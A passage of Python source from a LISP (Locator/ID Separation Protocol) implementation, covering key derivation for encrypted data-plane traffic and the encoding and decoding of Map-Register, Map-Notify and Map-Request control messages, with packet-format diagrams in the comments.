public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != int): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != int): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context.encode(), data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
ek = lisp_hex_string(ek).zfill(32)
self.encrypt_key = ek.encode()
fill = 32 if self.do_poly else 40
ik = lisp_hex_string(ik).zfill(fill)
self.icv_key = ik.encode()
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
if (lisp_is_python2()):
hash_output = hexlify(hash_output.encode("raw_unicode_escape"))
else:
hash_output = hexlify(hash_output).decode()
#endif
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (nonce not in lisp_crypto_keys_by_nonce):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (nonce not in lisp_crypto_keys_by_nonce): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (addr_str not in by_rlocs):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = b""
for i in range(0, len(key), 2):
byte = int(key[i:i+2], 16)
new_key += lisp_store_byte(byte)
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_store_byte
#
# We have to store a byte differently in a py2 string versus a py3 byte string.
# Check if the code was compiled with either python2 or python3.
#
def lisp_store_byte_py2(byte):
return(chr(byte))
#enddef
def lisp_store_byte_py3(byte):
return(bytes([byte]))
#enddef
lisp_store_byte = lisp_store_byte_py2
if (lisp_is_python3()): lisp_store_byte = lisp_store_byte_py3
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread(object):
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header(object):
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register(object):
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = b""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce = byte_swap_64(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = b""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify(object):
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request(object):
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
